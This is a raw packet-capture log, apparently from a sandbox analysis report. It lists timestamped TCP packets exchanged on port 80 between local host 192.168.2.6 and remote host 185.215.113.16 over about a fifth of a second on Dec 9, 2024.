                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.116676092 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.116713047 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.117651939 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.117754936 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.117803097 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.117852926 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.118824005 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.118899107 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.119172096 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.119220018 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.119844913 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.119857073 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.119890928 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.120965958 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.121028900 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.121062040 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.121099949 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.122030020 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.122092962 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.122236013 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.122287035 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.123094082 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.123151064 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.123706102 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.124471903 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.124515057 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.124645948 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.124979019 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.125293016 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.125430107 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.125969887 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.126101017 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.126394987 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.126545906 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.126576900 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.126722097 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.127389908 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.127443075 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.127593994 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.127687931 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.128496885 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.128539085 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.128622055 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.129086018 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.129545927 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.129645109 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.129722118 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.129755974 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.130630016 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.130727053 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.130729914 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.130877018 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.131889105 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.131970882 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.132333994 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.132406950 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.132819891 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.132869005 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.133187056 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.133274078 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.133950949 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.133987904 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.134022951 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.134052038 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.134974957 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.135195971 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.135246992 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.136044979 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.136217117 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.136584997 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.136703968 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.137250900 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.137330055 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.137332916 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.137372017 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.138247013 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.138264894 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.138317108 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.139368057 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.139427900 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.139667034 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.140387058 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.140441895 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.140552998 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.140642881 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.141470909 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.141522884 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.141772985 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.141815901 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.142554045 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.142647982 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.142693043 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.143693924 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.143882990 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.144033909 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.144865990 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.144915104 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.145066977 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.145108938 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.145873070 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.145925045 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.145953894 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.145997047 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.146915913 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.146970987 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.147203922 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.148025036 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.148077011 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.148365021 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.148617983 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.149125099 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.149159908 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.149250984 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.149297953 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.150167942 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.150217056 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.150285959 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.150408030 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.151189089 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.151238918 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.151271105 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.151326895 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.152416945 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.152514935 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.152661085 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.152725935 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.153569937 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.153621912 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.153788090 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.153840065 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.154499054 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.154553890 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.154607058 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.154648066 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.155621052 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.155673027 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.155725956 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.155875921 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.156653881 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.156703949 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.156853914 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.156950951 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.157706022 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.157749891 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.157982111 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.158049107 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.158871889 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.158920050 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.159292936 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.159414053 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.159856081 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.159892082 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.160213947 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.160268068 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.160995960 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.161047935 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.161222935 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.161267042 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.162132025 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.162250042 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.162446976 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.163204908 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.163533926 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.163584948 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.164208889 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.164264917 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.164285898 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.164339066 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.165277004 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.165438890 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.165455103 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.165641069 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.166353941 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.167011023 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.167073011 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.167803049 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.167862892 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.168025017 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.168071032 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.168817997 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.168874025 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.169060946 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.169104099 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.169756889 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.169811010 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.169934034 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.170000076 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.170728922 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.170787096 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.171391010 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.171447992 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.171952963 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.172004938 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.172267914 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.172539949 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.172782898 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.172822952 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.308187962 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.308252096 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.308337927 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.308680058 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.308852911 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.308902979 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.309811115 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.309977055 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.310043097 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.310836077 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.310913086 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.310985088 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.311081886 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.312127113 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.312165976 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.312361956 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.312438965 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.313081980 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.313186884 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.314169884 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.314241886 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.314454079 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.314726114 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.315306902 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.315390110 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.315592051 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.315653086 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.316231966 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.316322088 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.316364050 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.317342043 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.317965984 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.318048954 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.318403006 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.318820953 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.318878889 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.319494009 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.319505930 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.319550037 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.320581913 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.320640087 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.321050882 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.321099043 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.321727037 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.321780920 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.321820974 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.322267056 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.322736979 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.322796106 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.323158026 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.323334932 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.323899031 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.323955059 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.323961020 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.324410915 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.324889898 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.324968100 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.325329065 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.325386047 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.325957060 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.326003075 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.326154947 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.326669931 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.327068090 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.327110052 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.327179909 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.327218056 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.328176975 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.328218937 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.328607082 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.328649044 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.329261065 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.329303980 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.329452038 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.329503059 CET4996980192.168.2.6185.215.113.16
